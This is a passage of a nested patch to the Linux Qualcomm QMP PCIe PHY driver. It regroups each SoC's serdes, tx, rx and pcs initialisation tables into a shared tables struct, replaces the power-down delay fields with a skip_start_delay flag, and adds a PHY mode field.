++	const struct qmp_phy_cfg_tables *tables_ep;
+ 
+ 	/* clock ids to be requested */
+ 	const char * const *clk_list;
+@@ -1344,11 +1385,7 @@ struct qmp_phy_cfg {
+ 	/* bit offset of PHYSTATUS in QPHY_PCS_STATUS register */
+ 	unsigned int phy_status;
+ 
+-	/* true, if PHY needs delay after POWER_DOWN */
+-	bool has_pwrdn_delay;
+-	/* power_down delay in usec */
+-	int pwrdn_delay_min;
+-	int pwrdn_delay_max;
++	bool skip_start_delay;
+ 
+ 	/* QMP PHY pipe clock interface rate */
+ 	unsigned long pipe_clock_rate;
+@@ -1368,6 +1405,7 @@ struct qmp_phy_cfg {
+  * @pcs_misc: iomapped memory space for lane's pcs_misc
+  * @pipe_clk: pipe clock
+  * @qmp: QMP phy to which this lane belongs
++ * @mode: currently selected PHY mode
+  */
+ struct qmp_phy {
+ 	struct phy *phy;
+@@ -1381,6 +1419,7 @@ struct qmp_phy {
+ 	void __iomem *pcs_misc;
+ 	struct clk *pipe_clk;
+ 	struct qcom_qmp *qmp;
++	int mode;
+ };
+ 
+ /**
+@@ -1459,14 +1498,16 @@ static const char * const sdm845_pciephy_reset_l[] = {
+ static const struct qmp_phy_cfg ipq8074_pciephy_cfg = {
+ 	.lanes			= 1,
+ 
+-	.serdes_tbl		= ipq8074_pcie_serdes_tbl,
+-	.serdes_tbl_num		= ARRAY_SIZE(ipq8074_pcie_serdes_tbl),
+-	.tx_tbl			= ipq8074_pcie_tx_tbl,
+-	.tx_tbl_num		= ARRAY_SIZE(ipq8074_pcie_tx_tbl),
+-	.rx_tbl			= ipq8074_pcie_rx_tbl,
+-	.rx_tbl_num		= ARRAY_SIZE(ipq8074_pcie_rx_tbl),
+-	.pcs_tbl		= ipq8074_pcie_pcs_tbl,
+-	.pcs_tbl_num		= ARRAY_SIZE(ipq8074_pcie_pcs_tbl),
++	.tables = {
++		.serdes		= ipq8074_pcie_serdes_tbl,
++		.serdes_num	= ARRAY_SIZE(ipq8074_pcie_serdes_tbl),
++		.tx		= ipq8074_pcie_tx_tbl,
++		.tx_num		= ARRAY_SIZE(ipq8074_pcie_tx_tbl),
++		.rx		= ipq8074_pcie_rx_tbl,
++		.rx_num		= ARRAY_SIZE(ipq8074_pcie_rx_tbl),
++		.pcs		= ipq8074_pcie_pcs_tbl,
++		.pcs_num	= ARRAY_SIZE(ipq8074_pcie_pcs_tbl),
++	},
+ 	.clk_list		= ipq8074_pciephy_clk_l,
+ 	.num_clks		= ARRAY_SIZE(ipq8074_pciephy_clk_l),
+ 	.reset_list		= ipq8074_pciephy_reset_l,
+@@ -1478,23 +1519,23 @@ static const struct qmp_phy_cfg ipq8074_pciephy_cfg = {
+ 	.start_ctrl		= SERDES_START | PCS_START,
+ 	.pwrdn_ctrl		= SW_PWRDN | REFCLK_DRV_DSBL,
+ 	.phy_status		= PHYSTATUS,
+-
+-	.has_pwrdn_delay	= true,
+-	.pwrdn_delay_min	= 995,		/* us */
+-	.pwrdn_delay_max	= 1005,		/* us */
+ };
+ 
+ static const struct qmp_phy_cfg ipq8074_pciephy_gen3_cfg = {
+ 	.lanes			= 1,
+ 
+-	.serdes_tbl		= ipq8074_pcie_gen3_serdes_tbl,
+-	.serdes_tbl_num		= ARRAY_SIZE(ipq8074_pcie_gen3_serdes_tbl),
+-	.tx_tbl			= ipq8074_pcie_gen3_tx_tbl,
+-	.tx_tbl_num		= ARRAY_SIZE(ipq8074_pcie_gen3_tx_tbl),
+-	.rx_tbl			= ipq8074_pcie_gen3_rx_tbl,
+-	.rx_tbl_num		= ARRAY_SIZE(ipq8074_pcie_gen3_rx_tbl),
+-	.pcs_tbl		= ipq8074_pcie_gen3_pcs_tbl,
+-	.pcs_tbl_num		= ARRAY_SIZE(ipq8074_pcie_gen3_pcs_tbl),
++	.tables = {
++		.serdes		= ipq8074_pcie_gen3_serdes_tbl,
++		.serdes_num	= ARRAY_SIZE(ipq8074_pcie_gen3_serdes_tbl),
++		.tx		= ipq8074_pcie_gen3_tx_tbl,
++		.tx_num		= ARRAY_SIZE(ipq8074_pcie_gen3_tx_tbl),
++		.rx		= ipq8074_pcie_gen3_rx_tbl,
++		.rx_num		= ARRAY_SIZE(ipq8074_pcie_gen3_rx_tbl),
++		.pcs		= ipq8074_pcie_gen3_pcs_tbl,
++		.pcs_num	= ARRAY_SIZE(ipq8074_pcie_gen3_pcs_tbl),
++		.pcs_misc	= ipq8074_pcie_gen3_pcs_misc_tbl,
++		.pcs_misc_num	= ARRAY_SIZE(ipq8074_pcie_gen3_pcs_misc_tbl),
++	},
+ 	.clk_list		= ipq8074_pciephy_clk_l,
+ 	.num_clks		= ARRAY_SIZE(ipq8074_pciephy_clk_l),
+ 	.reset_list		= ipq8074_pciephy_reset_l,
+@@ -1505,10 +1546,7 @@ static const struct qmp_phy_cfg ipq8074_pciephy_gen3_cfg = {
+ 
+ 	.start_ctrl		= SERDES_START | PCS_START,
+ 	.pwrdn_ctrl		= SW_PWRDN | REFCLK_DRV_DSBL,
+-
+-	.has_pwrdn_delay	= true,
+-	.pwrdn_delay_min	= 995,		/* us */
+-	.pwrdn_delay_max	= 1005,		/* us */
++	.phy_status		= PHYSTATUS,
+ 
+ 	.pipe_clock_rate	= 250000000,
+ };
+@@ -1516,16 +1554,18 @@ static const struct qmp_phy_cfg ipq8074_pciephy_gen3_cfg = {
+ static const struct qmp_phy_cfg ipq6018_pciephy_cfg = {
+ 	.lanes			= 1,
+ 
+-	.serdes_tbl		= ipq6018_pcie_serdes_tbl,
+-	.serdes_tbl_num		= ARRAY_SIZE(ipq6018_pcie_serdes_tbl),
+-	.tx_tbl			= ipq6018_pcie_tx_tbl,
+-	.tx_tbl_num		= ARRAY_SIZE(ipq6018_pcie_tx_tbl),
+-	.rx_tbl			= ipq6018_pcie_rx_tbl,
+-	.rx_tbl_num		= ARRAY_SIZE(ipq6018_pcie_rx_tbl),
+-	.pcs_tbl		= ipq6018_pcie_pcs_tbl,
+-	.pcs_tbl_num		= ARRAY_SIZE(ipq6018_pcie_pcs_tbl),
+-	.pcs_misc_tbl		= ipq6018_pcie_pcs_misc_tbl,
+-	.pcs_misc_tbl_num	= ARRAY_SIZE(ipq6018_pcie_pcs_misc_tbl),
++	.tables = {
++		.serdes		= ipq6018_pcie_serdes_tbl,
++		.serdes_num	= ARRAY_SIZE(ipq6018_pcie_serdes_tbl),
++		.tx		= ipq6018_pcie_tx_tbl,
++		.tx_num		= ARRAY_SIZE(ipq6018_pcie_tx_tbl),
++		.rx		= ipq6018_pcie_rx_tbl,
++		.rx_num		= ARRAY_SIZE(ipq6018_pcie_rx_tbl),
++		.pcs		= ipq6018_pcie_pcs_tbl,
++		.pcs_num	= ARRAY_SIZE(ipq6018_pcie_pcs_tbl),
++		.pcs_misc	= ipq6018_pcie_pcs_misc_tbl,
++		.pcs_misc_num	= ARRAY_SIZE(ipq6018_pcie_pcs_misc_tbl),
++	},
+ 	.clk_list		= ipq8074_pciephy_clk_l,
+ 	.num_clks		= ARRAY_SIZE(ipq8074_pciephy_clk_l),
+ 	.reset_list		= ipq8074_pciephy_reset_l,
+@@ -1536,25 +1576,24 @@ static const struct qmp_phy_cfg ipq6018_pciephy_cfg = {
+ 
+ 	.start_ctrl		= SERDES_START | PCS_START,
+ 	.pwrdn_ctrl		= SW_PWRDN | REFCLK_DRV_DSBL,
+-
+-	.has_pwrdn_delay	= true,
+-	.pwrdn_delay_min	= 995,		/* us */
+-	.pwrdn_delay_max	= 1005,		/* us */
++	.phy_status		= PHYSTATUS,
+ };
+ 
+ static const struct qmp_phy_cfg sdm845_qmp_pciephy_cfg = {
+ 	.lanes			= 1,
+ 
+-	.serdes_tbl		= sdm845_qmp_pcie_serdes_tbl,
+-	.serdes_tbl_num		= ARRAY_SIZE(sdm845_qmp_pcie_serdes_tbl),
+-	.tx_tbl			= sdm845_qmp_pcie_tx_tbl,
+-	.tx_tbl_num		= ARRAY_SIZE(sdm845_qmp_pcie_tx_tbl),
+-	.rx_tbl			= sdm845_qmp_pcie_rx_tbl,
+-	.rx_tbl_num		= ARRAY_SIZE(sdm845_qmp_pcie_rx_tbl),
+-	.pcs_tbl		= sdm845_qmp_pcie_pcs_tbl,
+-	.pcs_tbl_num		= ARRAY_SIZE(sdm845_qmp_pcie_pcs_tbl),
+-	.pcs_misc_tbl		= sdm845_qmp_pcie_pcs_misc_tbl,
+-	.pcs_misc_tbl_num	= ARRAY_SIZE(sdm845_qmp_pcie_pcs_misc_tbl),
++	.tables = {
++		.serdes		= sdm845_qmp_pcie_serdes_tbl,
++		.serdes_num	= ARRAY_SIZE(sdm845_qmp_pcie_serdes_tbl),
++		.tx		= sdm845_qmp_pcie_tx_tbl,
++		.tx_num		= ARRAY_SIZE(sdm845_qmp_pcie_tx_tbl),
++		.rx		= sdm845_qmp_pcie_rx_tbl,
++		.rx_num		= ARRAY_SIZE(sdm845_qmp_pcie_rx_tbl),
++		.pcs		= sdm845_qmp_pcie_pcs_tbl,
++		.pcs_num	= ARRAY_SIZE(sdm845_qmp_pcie_pcs_tbl),
++		.pcs_misc	= sdm845_qmp_pcie_pcs_misc_tbl,
++		.pcs_misc_num	= ARRAY_SIZE(sdm845_qmp_pcie_pcs_misc_tbl),
++	},
+ 	.clk_list		= sdm845_pciephy_clk_l,
+ 	.num_clks		= ARRAY_SIZE(sdm845_pciephy_clk_l),
+ 	.reset_list		= sdm845_pciephy_reset_l,
+@@ -1566,23 +1605,21 @@ static const struct qmp_phy_cfg sdm845_qmp_pciephy_cfg = {
+ 	.start_ctrl		= PCS_START | SERDES_START,
+ 	.pwrdn_ctrl		= SW_PWRDN | REFCLK_DRV_DSBL,
+ 	.phy_status		= PHYSTATUS,
+-
+-	.has_pwrdn_delay	= true,
+-	.pwrdn_delay_min	= 995,		/* us */
+-	.pwrdn_delay_max	= 1005,		/* us */
+ };
+ 
+ static const struct qmp_phy_cfg sdm845_qhp_pciephy_cfg = {
+ 	.lanes			= 1,
+ 
+-	.serdes_tbl		= sdm845_qhp_pcie_serdes_tbl,
+-	.serdes_tbl_num		= ARRAY_SIZE(sdm845_qhp_pcie_serdes_tbl),
+-	.tx_tbl			= sdm845_qhp_pcie_tx_tbl,
+-	.tx_tbl_num		= ARRAY_SIZE(sdm845_qhp_pcie_tx_tbl),
+-	.rx_tbl			= sdm845_qhp_pcie_rx_tbl,
+-	.rx_tbl_num		= ARRAY_SIZE(sdm845_qhp_pcie_rx_tbl),
+-	.pcs_tbl		= sdm845_qhp_pcie_pcs_tbl,
+-	.pcs_tbl_num		= ARRAY_SIZE(sdm845_qhp_pcie_pcs_tbl),
++	.tables = {
++		.serdes		= sdm845_qhp_pcie_serdes_tbl,
++		.serdes_num	= ARRAY_SIZE(sdm845_qhp_pcie_serdes_tbl),
++		.tx		= sdm845_qhp_pcie_tx_tbl,
++		.tx_num		= ARRAY_SIZE(sdm845_qhp_pcie_tx_tbl),
++		.rx		= sdm845_qhp_pcie_rx_tbl,
++		.rx_num		= ARRAY_SIZE(sdm845_qhp_pcie_rx_tbl),
++		.pcs		= sdm845_qhp_pcie_pcs_tbl,
++		.pcs_num	= ARRAY_SIZE(sdm845_qhp_pcie_pcs_tbl),
++	},
+ 	.clk_list		= sdm845_pciephy_clk_l,
+ 	.num_clks		= ARRAY_SIZE(sdm845_pciephy_clk_l),
+ 	.reset_list		= sdm845_pciephy_reset_l,
+@@ -1594,33 +1631,33 @@ static const struct qmp_phy_cfg sdm845_qhp_pciephy_cfg = {
+ 	.start_ctrl		= PCS_START | SERDES_START,
+ 	.pwrdn_ctrl		= SW_PWRDN | REFCLK_DRV_DSBL,
+ 	.phy_status		= PHYSTATUS,
+-
+-	.has_pwrdn_delay	= true,
+-	.pwrdn_delay_min	= 995,		/* us */
+-	.pwrdn_delay_max	= 1005,		/* us */
+ };
+ 
+ static const struct qmp_phy_cfg sm8250_qmp_gen3x1_pciephy_cfg = {
+ 	.lanes			= 1,
+ 
+-	.serdes_tbl		= sm8250_qmp_pcie_serdes_tbl,
+-	.serdes_tbl_num		= ARRAY_SIZE(sm8250_qmp_pcie_serdes_tbl),
+-	.serdes_tbl_sec		= sm8250_qmp_gen3x1_pcie_serdes_tbl,
+-	.serdes_tbl_num_sec	= ARRAY_SIZE(sm8250_qmp_gen3x1_pcie_serdes_tbl),
+-	.tx_tbl			= sm8250_qmp_pcie_tx_tbl,
+-	.tx_tbl_num		= ARRAY_SIZE(sm8250_qmp_pcie_tx_tbl),
+-	.rx_tbl			= sm8250_qmp_pcie_rx_tbl,
+-	.rx_tbl_num		= ARRAY_SIZE(sm8250_qmp_pcie_rx_tbl),
+-	.rx_tbl_sec		= sm8250_qmp_gen3x1_pcie_rx_tbl,
+-	.rx_tbl_num_sec		= ARRAY_SIZE(sm8250_qmp_gen3x1_pcie_rx_tbl),
+-	.pcs_tbl		= sm8250_qmp_pcie_pcs_tbl,
+-	.pcs_tbl_num		= ARRAY_SIZE(sm8250_qmp_pcie_pcs_tbl),
+-	.pcs_tbl_sec		= sm8250_qmp_gen3x1_pcie_pcs_tbl,
+-	.pcs_tbl_num_sec		= ARRAY_SIZE(sm8250_qmp_gen3x1_pcie_pcs_tbl),
+-	.pcs_misc_tbl		= sm8250_qmp_pcie_pcs_misc_tbl,
+-	.pcs_misc_tbl_num	= ARRAY_SIZE(sm8250_qmp_pcie_pcs_misc_tbl),
+-	.pcs_misc_tbl_sec		= sm8250_qmp_gen3x1_pcie_pcs_misc_tbl,
+-	.pcs_misc_tbl_num_sec	= ARRAY_SIZE(sm8250_qmp_gen3x1_pcie_pcs_misc_tbl),
++	.tables = {
++		.serdes		= sm8250_qmp_pcie_serdes_tbl,
++		.serdes_num	= ARRAY_SIZE(sm8250_qmp_pcie_serdes_tbl),
++		.tx		= sm8250_qmp_pcie_tx_tbl,
++		.tx_num		= ARRAY_SIZE(sm8250_qmp_pcie_tx_tbl),
++		.rx		= sm8250_qmp_pcie_rx_tbl,
++		.rx_num		= ARRAY_SIZE(sm8250_qmp_pcie_rx_tbl),
++		.pcs		= sm8250_qmp_pcie_pcs_tbl,
++		.pcs_num	= ARRAY_SIZE(sm8250_qmp_pcie_pcs_tbl),
++		.pcs_misc	= sm8250_qmp_pcie_pcs_misc_tbl,
++		.pcs_misc_num	= ARRAY_SIZE(sm8250_qmp_pcie_pcs_misc_tbl),
++	},
++	.tables_rc = &(const struct qmp_phy_cfg_tables) {
++		.serdes		= sm8250_qmp_gen3x1_pcie_serdes_tbl,
++		.serdes_num	= ARRAY_SIZE(sm8250_qmp_gen3x1_pcie_serdes_tbl),
++		.rx		= sm8250_qmp_gen3x1_pcie_rx_tbl,
++		.rx_num		= ARRAY_SIZE(sm8250_qmp_gen3x1_pcie_rx_tbl),
++		.pcs		= sm8250_qmp_gen3x1_pcie_pcs_tbl,
++		.pcs_num	= ARRAY_SIZE(sm8250_qmp_gen3x1_pcie_pcs_tbl),
++		.pcs_misc	= sm8250_qmp_gen3x1_pcie_pcs_misc_tbl,
++		.pcs_misc_num	= ARRAY_SIZE(sm8250_qmp_gen3x1_pcie_pcs_misc_tbl),
++	},
+ 	.clk_list		= sdm845_pciephy_clk_l,
+ 	.num_clks		= ARRAY_SIZE(sdm845_pciephy_clk_l),
+ 	.reset_list		= sdm845_pciephy_reset_l,
+@@ -1632,33 +1669,33 @@ static const struct qmp_phy_cfg sm8250_qmp_gen3x1_pciephy_cfg = {
+ 	.start_ctrl		= PCS_START | SERDES_START,
+ 	.pwrdn_ctrl		= SW_PWRDN | REFCLK_DRV_DSBL,
+ 	.phy_status		= PHYSTATUS,
+-
+-	.has_pwrdn_delay	= true,
+-	.pwrdn_delay_min	= 995,		/* us */
+-	.pwrdn_delay_max	= 1005,		/* us */
+ };
+ 
+ static const struct qmp_phy_cfg sm8250_qmp_gen3x2_pciephy_cfg = {
+ 	.lanes			= 2,
+ 
+-	.serdes_tbl		= sm8250_qmp_pcie_serdes_tbl,
+-	.serdes_tbl_num		= ARRAY_SIZE(sm8250_qmp_pcie_serdes_tbl),
+-	.tx_tbl			= sm8250_qmp_pcie_tx_tbl,
+-	.tx_tbl_num		= ARRAY_SIZE(sm8250_qmp_pcie_tx_tbl),
+-	.tx_tbl_sec		= sm8250_qmp_gen3x2_pcie_tx_tbl,
+-	.tx_tbl_num_sec		= ARRAY_SIZE(sm8250_qmp_gen3x2_pcie_tx_tbl),
+-	.rx_tbl			= sm8250_qmp_pcie_rx_tbl,
+-	.rx_tbl_num		= ARRAY_SIZE(sm8250_qmp_pcie_rx_tbl),
+-	.rx_tbl_sec		= sm8250_qmp_gen3x2_pcie_rx_tbl,
+-	.rx_tbl_num_sec		= ARRAY_SIZE(sm8250_qmp_gen3x2_pcie_rx_tbl),
+-	.pcs_tbl		= sm8250_qmp_pcie_pcs_tbl,
+-	.pcs_tbl_num		= ARRAY_SIZE(sm8250_qmp_pcie_pcs_tbl),
+-	.pcs_tbl_sec		= sm8250_qmp_gen3x2_pcie_pcs_tbl,
+-	.pcs_tbl_num_sec		= ARRAY_SIZE(sm8250_qmp_gen3x2_pcie_pcs_tbl),
+-	.pcs_misc_tbl		= sm8250_qmp_pcie_pcs_misc_tbl,
+-	.pcs_misc_tbl_num	= ARRAY_SIZE(sm8250_qmp_pcie_pcs_misc_tbl),
+-	.pcs_misc_tbl_sec		= sm8250_qmp_gen3x2_pcie_pcs_misc_tbl,
+-	.pcs_misc_tbl_num_sec	= ARRAY_SIZE(sm8250_qmp_gen3x2_pcie_pcs_misc_tbl),
++	.tables = {
++		.serdes		= sm8250_qmp_pcie_serdes_tbl,
++		.serdes_num	= ARRAY_SIZE(sm8250_qmp_pcie_serdes_tbl),
++		.tx		= sm8250_qmp_pcie_tx_tbl,
++		.tx_num		= ARRAY_SIZE(sm8250_qmp_pcie_tx_tbl),
++		.rx		= sm8250_qmp_pcie_rx_tbl,
++		.rx_num		= ARRAY_SIZE(sm8250_qmp_pcie_rx_tbl),
++		.pcs		= sm8250_qmp_pcie_pcs_tbl,
++		.pcs_num	= ARRAY_SIZE(sm8250_qmp_pcie_pcs_tbl),
++		.pcs_misc	= sm8250_qmp_pcie_pcs_misc_tbl,
++		.pcs_misc_num	= ARRAY_SIZE(sm8250_qmp_pcie_pcs_misc_tbl),
++	},
++	.tables_rc = &(const struct qmp_phy_cfg_tables) {
++		.tx		= sm8250_qmp_gen3x2_pcie_tx_tbl,
++		.tx_num		= ARRAY_SIZE(sm8250_qmp_gen3x2_pcie_tx_tbl),
++		.rx		= sm8250_qmp_gen3x2_pcie_rx_tbl,
++		.rx_num		= ARRAY_SIZE(sm8250_qmp_gen3x2_pcie_rx_tbl),
++		.pcs		= sm8250_qmp_gen3x2_pcie_pcs_tbl,
++		.pcs_num	= ARRAY_SIZE(sm8250_qmp_gen3x2_pcie_pcs_tbl),
++		.pcs_misc	= sm8250_qmp_gen3x2_pcie_pcs_misc_tbl,
++		.pcs_misc_num	= ARRAY_SIZE(sm8250_qmp_gen3x2_pcie_pcs_misc_tbl),
++	},
+ 	.clk_list		= sdm845_pciephy_clk_l,
+ 	.num_clks		= ARRAY_SIZE(sdm845_pciephy_clk_l),
+ 	.reset_list		= sdm845_pciephy_reset_l,
+@@ -1670,23 +1707,21 @@ static const struct qmp_phy_cfg sm8250_qmp_gen3x2_pciephy_cfg = {
+ 	.start_ctrl		= PCS_START | SERDES_START,
+ 	.pwrdn_ctrl		= SW_PWRDN | REFCLK_DRV_DSBL,
+ 	.phy_status		= PHYSTATUS,
+-
+-	.has_pwrdn_delay	= true,
+-	.pwrdn_delay_min	= 995,		/* us */
+-	.pwrdn_delay_max	= 1005,		/* us */
+ };
+ 
+ static const struct qmp_phy_cfg msm8998_pciephy_cfg = {
+ 	.lanes			= 1,
+ 
+-	.serdes_tbl		= msm8998_pcie_serdes_tbl,
+-	.serdes_tbl_num		= ARRAY_SIZE(msm8998_pcie_serdes_tbl),
+-	.tx_tbl			= msm8998_pcie_tx_tbl,
+-	.tx_tbl_num		= ARRAY_SIZE(msm8998_pcie_tx_tbl),
+-	.rx_tbl			= msm8998_pcie_rx_tbl,
+-	.rx_tbl_num		= ARRAY_SIZE(msm8998_pcie_rx_tbl),
+-	.pcs_tbl		= msm8998_pcie_pcs_tbl,
+-	.pcs_tbl_num		= ARRAY_SIZE(msm8998_pcie_pcs_tbl),
++	.tables = {
++		.serdes		= msm8998_pcie_serdes_tbl,
++		.serdes_num	= ARRAY_SIZE(msm8998_pcie_serdes_tbl),
++		.tx		= msm8998_pcie_tx_tbl,
++		.tx_num		= ARRAY_SIZE(msm8998_pcie_tx_tbl),
++		.rx		= msm8998_pcie_rx_tbl,
++		.rx_num		= ARRAY_SIZE(msm8998_pcie_rx_tbl),
++		.pcs		= msm8998_pcie_pcs_tbl,
++		.pcs_num	= ARRAY_SIZE(msm8998_pcie_pcs_tbl),
++	},
+ 	.clk_list		= msm8996_phy_clk_l,
+ 	.num_clks		= ARRAY_SIZE(msm8996_phy_clk_l),
+ 	.reset_list		= ipq8074_pciephy_reset_l,
+@@ -1698,21 +1733,25 @@ static const struct qmp_phy_cfg msm8998_pciephy_cfg = {
+ 	.start_ctrl             = SERDES_START | PCS_START,
+ 	.pwrdn_ctrl		= SW_PWRDN | REFCLK_DRV_DSBL,
+ 	.phy_status		= PHYSTATUS,
++
++	.skip_start_delay	= true,
+ };
+ 
+ static const struct qmp_phy_cfg sc8180x_pciephy_cfg = {
+ 	.lanes			= 1,
+ 
+-	.serdes_tbl		= sc8180x_qmp_pcie_serdes_tbl,
+-	.serdes_tbl_num		= ARRAY_SIZE(sc8180x_qmp_pcie_serdes_tbl),
+-	.tx_tbl			= sc8180x_qmp_pcie_tx_tbl,
+-	.tx_tbl_num		= ARRAY_SIZE(sc8180x_qmp_pcie_tx_tbl),
+-	.rx_tbl			= sc8180x_qmp_pcie_rx_tbl,
+-	.rx_tbl_num		= ARRAY_SIZE(sc8180x_qmp_pcie_rx_tbl),
+-	.pcs_tbl		= sc8180x_qmp_pcie_pcs_tbl,
+-	.pcs_tbl_num		= ARRAY_SIZE(sc8180x_qmp_pcie_pcs_tbl),
+-	.pcs_misc_tbl		= sc8180x_qmp_pcie_pcs_misc_tbl,
+-	.pcs_misc_tbl_num	= ARRAY_SIZE(sc8180x_qmp_pcie_pcs_misc_tbl),
++	.tables = {
++		.serdes		= sc8180x_qmp_pcie_serdes_tbl,
++		.serdes_num	= ARRAY_SIZE(sc8180x_qmp_pcie_serdes_tbl),
++		.tx		= sc8180x_qmp_pcie_tx_tbl,
++		.tx_num		= ARRAY_SIZE(sc8180x_qmp_pcie_tx_tbl),
++		.rx		= sc8180x_qmp_pcie_rx_tbl,
++		.rx_num		= ARRAY_SIZE(sc8180x_qmp_pcie_rx_tbl),
++		.pcs		= sc8180x_qmp_pcie_pcs_tbl,
++		.pcs_num	= ARRAY_SIZE(sc8180x_qmp_pcie_pcs_tbl),
++		.pcs_misc	= sc8180x_qmp_pcie_pcs_misc_tbl,
++		.pcs_misc_num	= ARRAY_SIZE(sc8180x_qmp_pcie_pcs_misc_tbl),
++	},
+ 	.clk_list		= sdm845_pciephy_clk_l,
+ 	.num_clks		= ARRAY_SIZE(sdm845_pciephy_clk_l),
+ 	.reset_list		= sdm845_pciephy_reset_l,
+@@ -1723,25 +1762,24 @@ static const struct qmp_phy_cfg sc8180x_pciephy_cfg = {
+ 
+ 	.start_ctrl		= PCS_START | SERDES_START,
+ 	.pwrdn_ctrl		= SW_PWRDN | REFCLK_DRV_DSBL,
+-
+-	.has_pwrdn_delay	= true,
+-	.pwrdn_delay_min	= 995,		/* us */
+-	.pwrdn_delay_max	= 1005,		/* us */
++	.phy_status		= PHYSTATUS,
+ };
+ 
+ static const struct qmp_phy_cfg sdx55_qmp_pciephy_cfg = {
+ 	.lanes			= 2,
+ 
+-	.serdes_tbl		= sdx55_qmp_pcie_serdes_tbl,
+-	.serdes_tbl_num		= ARRAY_SIZE(sdx55_qmp_pcie_serdes_tbl),
+-	.tx_tbl			= sdx55_qmp_pcie_tx_tbl,
+-	.tx_tbl_num		= ARRAY_SIZE(sdx55_qmp_pcie_tx_tbl),
+-	.rx_tbl			= sdx55_qmp_pcie_rx_tbl,
+-	.rx_tbl_num		= ARRAY_SIZE(sdx55_qmp_pcie_rx_tbl),
+-	.pcs_tbl		= sdx55_qmp_pcie_pcs_tbl,
+-	.pcs_tbl_num		= ARRAY_SIZE(sdx55_qmp_pcie_pcs_tbl),
+-	.pcs_misc_tbl		= sdx55_qmp_pcie_pcs_misc_tbl,
+-	.pcs_misc_tbl_num	= ARRAY_SIZE(sdx55_qmp_pcie_pcs_misc_tbl),
++	.tables = {
++		.serdes		= sdx55_qmp_pcie_serdes_tbl,
++		.serdes_num	= ARRAY_SIZE(sdx55_qmp_pcie_serdes_tbl),
++		.tx		= sdx55_qmp_pcie_tx_tbl,
++		.tx_num		= ARRAY_SIZE(sdx55_qmp_pcie_tx_tbl),
++		.rx		= sdx55_qmp_pcie_rx_tbl,
++		.rx_num		= ARRAY_SIZE(sdx55_qmp_pcie_rx_tbl),
++		.pcs		= sdx55_qmp_pcie_pcs_tbl,
++		.pcs_num	= ARRAY_SIZE(sdx55_qmp_pcie_pcs_tbl),
++		.pcs_misc	= sdx55_qmp_pcie_pcs_misc_tbl,
++		.pcs_misc_num	= ARRAY_SIZE(sdx55_qmp_pcie_pcs_misc_tbl),
++	},
+ 	.clk_list		= sdm845_pciephy_clk_l,
+ 	.num_clks		= ARRAY_SIZE(sdm845_pciephy_clk_l),
+ 	.reset_list		= sdm845_pciephy_reset_l,
+@@ -1753,25 +1791,23 @@ static const struct qmp_phy_cfg sdx55_qmp_pciephy_cfg = {
+ 	.start_ctrl		= PCS_START | SERDES_START,
+ 	.pwrdn_ctrl		= SW_PWRDN,
+ 	.phy_status		= PHYSTATUS_4_20,
+-
+-	.has_pwrdn_delay	= true,
+-	.pwrdn_delay_min	= 995,		/* us */
+-	.pwrdn_delay_max	= 1005,		/* us */
+ };
+ 
+ static const struct qmp_phy_cfg sm8450_qmp_gen3x1_pciephy_cfg = {
+ 	.lanes			= 1,
+ 
+-	.serdes_tbl		= sm8450_qmp_gen3x1_pcie_serdes_tbl,
+-	.serdes_tbl_num		= ARRAY_SIZE(sm8450_qmp_gen3x1_pcie_serdes_tbl),
+-	.tx_tbl			= sm8450_qmp_gen3x1_pcie_tx_tbl,
+-	.tx_tbl_num		= ARRAY_SIZE(sm8450_qmp_gen3x1_pcie_tx_tbl),
+-	.rx_tbl			= sm8450_qmp_gen3x1_pcie_rx_tbl,
+-	.rx_tbl_num		= ARRAY_SIZE(sm8450_qmp_gen3x1_pcie_rx_tbl),
+-	.pcs_tbl		= sm8450_qmp_gen3x1_pcie_pcs_tbl,
+-	.pcs_tbl_num		= ARRAY_SIZE(sm8450_qmp_gen3x1_pcie_pcs_tbl),
+-	.pcs_misc_tbl		= sm8450_qmp_gen3x1_pcie_pcs_misc_tbl,
+-	.pcs_misc_tbl_num	= ARRAY_SIZE(sm8450_qmp_gen3x1_pcie_pcs_misc_tbl),
++	.tables = {
++		.serdes		= sm8450_qmp_gen3x1_pcie_serdes_tbl,
++		.serdes_num	= ARRAY_SIZE(sm8450_qmp_gen3x1_pcie_serdes_tbl),
++		.tx		= sm8450_qmp_gen3x1_pcie_tx_tbl,
++		.tx_num		= ARRAY_SIZE(sm8450_qmp_gen3x1_pcie_tx_tbl),
++		.rx		= sm8450_qmp_gen3x1_pcie_rx_tbl,
++		.rx_num		= ARRAY_SIZE(sm8450_qmp_gen3x1_pcie_rx_tbl),
++		.pcs		= sm8450_qmp_gen3x1_pcie_pcs_tbl,
++		.pcs_num	= ARRAY_SIZE(sm8450_qmp_gen3x1_pcie_pcs_tbl),
++		.pcs_misc	= sm8450_qmp_gen3x1_pcie_pcs_misc_tbl,
++		.pcs_misc_num	= ARRAY_SIZE(sm8450_qmp_gen3x1_pcie_pcs_misc_tbl),
++	},
+ 	.clk_list		= sdm845_pciephy_clk_l,
+ 	.num_clks		= ARRAY_SIZE(sdm845_pciephy_clk_l),
+ 	.reset_list		= sdm845_pciephy_reset_l,
+@@ -1783,25 +1819,38 @@ static const struct qmp_phy_cfg sm8450_qmp_gen3x1_pciephy_cfg = {
+ 	.start_ctrl             = SERDES_START | PCS_START,
+ 	.pwrdn_ctrl		= SW_PWRDN | REFCLK_DRV_DSBL,
+ 	.phy_status		= PHYSTATUS,
+-
+-	.has_pwrdn_delay	= true,
+-	.pwrdn_delay_min	= 995,		/* us */
+-	.pwrdn_delay_max	= 1005,		/* us */
+ };
+ 
+ static const struct qmp_phy_cfg sm8450_qmp_gen4x2_pciephy_cfg = {
+ 	.lanes			= 2,
+ 
+-	.serdes_tbl		= sm8450_qmp_gen4x2_pcie_serdes_tbl,
+-	.serdes_tbl_num		= ARRAY_SIZE(sm8450_qmp_gen4x2_pcie_serdes_tbl),
+-	.tx_tbl			= sm8450_qmp_gen4x2_pcie_tx_tbl,
+-	.tx_tbl_num		= ARRAY_SIZE(sm8450_qmp_gen4x2_pcie_tx_tbl),
+-	.rx_tbl			= sm8450_qmp_gen4x2_pcie_rx_tbl,
+-	.rx_tbl_num		= ARRAY_SIZE(sm8450_qmp_gen4x2_pcie_rx_tbl),
+-	.pcs_tbl		= sm8450_qmp_gen4x2_pcie_pcs_tbl,
+-	.pcs_tbl_num		= ARRAY_SIZE(sm8450_qmp_gen4x2_pcie_pcs_tbl),
+-	.pcs_misc_tbl		= sm8450_qmp_gen4x2_pcie_pcs_misc_tbl,
+-	.pcs_misc_tbl_num	= ARRAY_SIZE(sm8450_qmp_gen4x2_pcie_pcs_misc_tbl),
++	.tables = {
